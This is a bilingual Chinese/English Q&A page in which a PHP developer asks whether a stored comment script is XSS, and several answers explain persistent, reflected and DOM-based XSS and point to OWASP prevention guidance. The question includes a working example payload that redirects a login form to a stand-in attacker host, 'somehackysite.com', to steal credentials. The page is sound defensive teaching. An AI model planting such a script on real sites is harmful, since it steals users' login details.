用户使用 Javascript 输入 HTML 并显示给其他人但未进行 HTML 转义是否是 XSS 的示例
我是一名 PHP 开发人员,我希望提高网站的安全性。
据我了解,以下是影响 Web 应用程序的两类主要漏洞:
- SQL 注入
- XSS
SQL 注入可以使用准备好的语句进行修复 - 很简单。
但我仍然没有真正理解 XSS - 以下是 XSS 的示例吗?...
- 充满用户制作内容的页面顶部有一个登录表单(站点范围内)。
- 用户对页面的输入未进行 HTML 转义。
- 用户将以下内容(例如评论)发布到页面...
A really nice comment
<!-- now an evil script (example here with jquery, but easily done without) --->
<script type="text/javascript">
$(document).ready(function() {
$('#login_form').attr('action','http://somehackysite.com/givemeyourpw.php');
});
</script>
- 无辜的用户来到该页面,脚本执行。
- 无辜的用户意识到他们没有登录,并在表单中输入了他们的详细信息。
- 用户的详细信息被发送到
http://somehackysite.com/givemyourpw.php,然后用户的帐户详细信息被盗。
所以我真的有三个问题:
- 这行得通吗?
- 这是XSS吗?
- 除了转义 HTML 之外,开发人员还应该采取哪些预防措施来应对 XSS?
I'm a PHP developer and I'm looking to improve the security of my sites.
From what I understand the following are two major types of vulnerabilities which affect web applications:
- SQL Injection
- XSS
SQL Injection can be fixed with prepared statements - easy.
But I still don't really get XSS - is the following an example of XSS?...
- Page full of user-made content has a login form at the top (site-wide).
- The user's input to the page is not HTML-escaped.
- A user posts the following content (e.g. a comment) to the page...
A really nice comment
<!-- now an evil script (example here with jquery, but easily done without) --->
<script type="text/javascript">
$(document).ready(function() {
$('#login_form').attr('action','http://somehackysite.com/givemeyourpw.php');
});
</script>
- An innocent user comes to the page, the script executes.
- The innocent user realises they're not logged in, and enter their details into the form.
- The user's details are sent off to
http://somehackysite.com/givemyourpw.phpand then the user's account details are stolen.
So I really have three questions here:
- Would this work?
- Is this XSS?
- Are there any precautions developers should take against XSS other than escaping HTML?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(4)
XSS 攻击有两种类型:反射型 XSS 攻击和持久型 XSS 攻击。您所描述的情况,即网站用户输入保存在服务器端的数据,并为查看页面的任何人呈现的数据,被视为持久性 XSS。如果您的帖子上有一个无法转义 Javascript 的评论框,或者我可以在其中放入任何内容的个人资料页面,也会发生类似的攻击。
另一类 XSS 攻击是反射型 XSS。这些有点复杂,但它们相当于 URL 中未转义页面的参数之一。它们经常出现在大型网站的搜索页面等内容中。你会得到一个包含一些 javascript 的 URL(抱歉,我的示例被渲染器破坏了,所以我无法向你展示示例),并且该页面将渲染 javascript,这将允许某人制作恶意代码网址。这些在提供任何类型的金融数据的网站上尤其危险;想象一下,一个认真的用户总是检查以确保他们将访问其银行的写入链接,但由于反射型 XSS 攻击,攻击者能够将他们发送到其银行网站上的合法页面,但这具有恶意里面的代码。
无论如何,您的示例是持久性 XSS。除了更改登录表单向用户发送的位置之外,您还可以通过此类攻击做更多邪恶的事情。多年来,它们一直很流行,可以执行诸如从网站的个人区域抓取信息之类的操作,或者与 CSRF 结合使用,使经过身份验证的用户只需查看页面即可执行某些操作。不久前有一些 MySpace 病毒就做到了这一点,并从一个配置文件传播到另一个配置文件。
There are two types are XSS attacks: Reflected XSS and Persistent XSS attacks. What you've described, where a user of the site inputs data that gets saved on the server side, and is rendered for anyone viewing a page, is considered Persistent XSS. Similar attacks would be if you have a comment box on a post that doesn't escape Javascript, or a profile page I can put anything into.
The other class of XSS attacks is Reflected XSS. These are a little more complicated, but they amount to one of the arguments in the URL for a page not being escaped. They frequently come up in things like Search pages on large websites. You'll get a URL that includes some javascript in it (sorry, my example got mangled by the renderer here, so I can't show you an example) , and the page will render the javascript which would allow someone to craft a malicious URL. These are especially dangerous on sites that hand any sort of financial data; imagine a conscientious user who always checks to make sure the they're going to the write link to their bank, but because of a Reflected XSS attack an attacker is able to send them to a legitimate page on their bank's website, but that has malicious code in it.
In any case, your example is Persistent XSS. You can do even more nefarious things with attacks like that than just changing where a login form sends users. They've been popular for years to do things like scraping information from personal areas of sites, or coupled with CSRF to cause an authenticated user to do something by simply looking at a page. There were a few MySpace viruses a while back that did that, and spread from profile to profile.
是的,这通常是一个注入缺陷,在这种特殊情况下将被称为 XSS 漏洞,因为它注入的 JavaScript。
但是,这种注入缺陷(一个用户的输入会在不进行任何更改的情况下反映给其他用户)也可能引发其他攻击,例如污损 。
是的,这很可能会起作用,因为它是为该代码提供服务的源服务器,就像网页中的任何其他代码一样。因此,就像该网站的作者是该代码的创始人一样,也会受到同样的对待。
实际上存在三种不同类型的 XSS:基于 DOM 的 XSS、反射型 XSS 和 存储/持久 XSS)。您的示例是一个存储/持久的 XSS 漏洞,因为服务器会针对每个请求部署该漏洞。
一般规则是不信任任何用户输入。也就是说,要么只允许有效的用户输入,要么在输出之前对用户输入进行过滤(删除无效值)或正确编码(转换无效值)。有关更多信息,请参阅 OWASP 的 XSS 备忘单。
Yes, this is an injection flaw in general and would be referred to as a XSS exploit in this particular case as it’s JavaScript that was injected.
But this injection flaw, where one user’s input gets reflected to other users without any changes, can also yield to other attacks like defacement.
Yes, it’s very likely that this would work as it’s the origin server that serves this code snipped just like any other code in the web page. So it’s like the author of the web site is the originator of this code and will be treated likewise.
There are actually three different types of XSS: DOM based XSS, Reflected XSS, and Stored/persistent XSS). Your example is a stored/persistend XSS exploit as the server deploys the exploit with every request.
The general rule is not to trust any user input. That said either only valid user input should be allowed or the user input is filtered (removing invalid values) or properly encoded (convert invalid values) before outputting it. See OWASP’s XSS Cheat Sheet for further information.
这是 xss,我相信这也是 javascript 注入
所以我认为此链接会有所帮助
it's xss and i believe it's javascript injection too
so i think this link will help
是的,这是基本持久 XSS 攻击的一个示例。在这种情况下,用户不仅可以窃取凭据,还可以尝试通过您的网站感染访问者或垃圾邮件链接。
OWASP XSS 预防指南是一个好的开始。
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
Yes that is an example of a basic persistent XSS attack. Not only could a user steal credentials in this situation but also attempt to infect visitors, or spam links through your site.
OWASP XSS Prevention Guide is a good start.
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet